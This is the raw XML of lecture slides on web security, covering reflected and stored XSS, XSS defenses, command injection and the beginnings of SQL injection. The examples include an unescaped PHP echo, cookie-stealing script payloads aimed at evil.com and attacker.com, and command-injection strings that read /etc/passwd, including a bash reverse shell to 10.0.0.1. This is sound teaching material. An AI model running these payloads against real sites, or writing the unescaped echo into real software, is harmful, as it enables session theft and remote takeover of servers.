                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      &lt;body&gt; Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt;: ...&lt;/body&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   &lt;/html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if victim instead clicks on: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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="2" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.com?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> )  &lt;/script&gt;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81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Reflected XSS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762000" y="2667000"/>
            <a:ext cx="8116137" cy="3810000"/>
            <a:chOff x="762000" y="2514600"/>
            <a:chExt cx="8116137" cy="3810000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5622174" y="2514600"/>
              <a:ext cx="3255963" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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1436688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CompaqAlphaServerES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598988"/>
            <a:ext cx="1155700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DS15serverfro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4188" y="1135062"/>
            <a:ext cx="2436812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943600" y="754062"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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773863" y="4171950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1475581"/>
            <a:ext cx="3363912" cy="434182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prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21119711">
            <a:off x="2709070" y="1251971"/>
            <a:ext cx="2192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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2895600"/>
            <a:ext cx="4572000" cy="14478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6" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="3138488"/>
            <a:ext cx="2570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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3817938"/>
            <a:ext cx="3000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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3257550"/>
            <a:ext cx="5021263" cy="161925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/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4514850"/>
            <a:ext cx="53340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none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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33900" y="2057400"/>
            <a:ext cx="44577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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4819650"/>
            <a:ext cx="5334000" cy="1962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marL="0" lvl="2"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&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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 err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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&lt;/html&gt;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33900" y="2362200"/>
            <a:ext cx="4457700" cy="646112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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200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  term= &lt;script&gt; ... &lt;/script&gt;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28972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Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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601913"/>
            <a:ext cx="1436688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CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="1155700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S15serverfro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4188" y="1905000"/>
            <a:ext cx="2436812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943600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813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28600" y="3886200"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276600"/>
            <a:ext cx="17208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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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3" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a: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 rot="1039646">
            <a:off x="2713038" y="3703638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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a: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 rot="1068865">
            <a:off x="2084388" y="4086225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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="116205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19" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="68738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0" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="2301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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="2359025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40458C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21582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Stored XSS attack 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loaded images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user content (comments, blog posts)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="815365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XSS attacks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4572000" cy="148517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695591"/>
            <a:ext cx="2441443" cy="24414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760" y="1524001"/>
            <a:ext cx="2987040" cy="266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4" y="4135826"/>
            <a:ext cx="4953014" cy="240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73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 Stack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905000"/>
            <a:ext cx="2286000" cy="533400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7 - Application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2514600"/>
            <a:ext cx="2286000" cy="533400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6 - Presentation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3124200"/>
            <a:ext cx="2286000" cy="533400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5 - Session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3810000"/>
            <a:ext cx="2286000" cy="533400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4 - Transport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4419600"/>
            <a:ext cx="2286000" cy="533400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3 - Network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400" y="5029200"/>
            <a:ext cx="2286000" cy="533400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2 - Data Link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8316" y="5638800"/>
            <a:ext cx="2281662" cy="533400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1 - Physical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19800" y="1905000"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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HTTP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19800" y="3124200"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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TLS/SSL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19800" y="3810000"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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TCP/UDP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19800" y="4419600"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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IP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19800" y="5029200"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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Ethernet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24716" y="5638800"/>
            <a:ext cx="2286000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="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0s and 1s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276600" y="1905000"/>
            <a:ext cx="2286000" cy="53340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Deliver content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276600" y="2514600"/>
            <a:ext cx="2286000" cy="53340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Manage encoding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276600" y="3124200"/>
            <a:ext cx="2286000" cy="53340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Manage sessions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276600" y="3810000"/>
            <a:ext cx="2286000" cy="53340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Deliver (un)reliably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276600" y="4419600"/>
            <a:ext cx="2286000" cy="53340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Deliver globally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276600" y="5029200"/>
            <a:ext cx="2286000" cy="53340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Deliver locally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281516" y="5638800"/>
            <a:ext cx="2281662" cy="53340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Deliver signals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5137A91-D0A0-634C-B80F-58C8F59DB73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="3718560"/>
            <a:ext cx="8763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F525F37-4CFF-E640-9A63-3A0F53B0D70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7635711" y="4844534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Operating System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AC8AF13-DD4C-084A-B5EA-BE23B1DB6417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7994784" y="2582329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User Space</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286673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XSS Defenses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Parameter Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-Only Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1692577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97AA5-0703-3340-A49F-601B313B7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 Injection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EA6B1-8D14-AC46-83D8-638A02227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86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Key issue: exporting local execution capability via Web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Request:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ping?host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes: ping –c 2 8.8.8.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple command injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ping?host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=8.8.8.8;cat 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passwd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Executes: ping –c 2 8.8.8.8;cat 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passwd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Outputs ping output and the contents of “/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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting sneakier…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 8.8.8.8|cat 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passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 8.8.8.8&amp;cat$IFS$9/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passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 $(cat 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passwd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ping –c 2 &lt;(bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/10.0.0.1/443 0&gt;&amp;1)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00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Injection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SQL Injection is another example of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adversary exploits user-controlled input to change meaning of database command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390089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Injection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11500" y="2463800"/>
            <a:ext cx="1274763" cy="24066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b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server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2463800"/>
            <a:ext cx="1395413" cy="24066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b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412037" y="2463800"/>
            <a:ext cx="1274763" cy="24066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200" b="1"/>
              <a:t>DB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833563" y="3643312"/>
            <a:ext cx="1298575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1866900" y="4652962"/>
            <a:ext cx="11811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812925" y="2438400"/>
            <a:ext cx="1341438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/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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386263" y="2532062"/>
            <a:ext cx="3025774" cy="15286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b="1" dirty="0"/>
              <a:t>SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM Users</a:t>
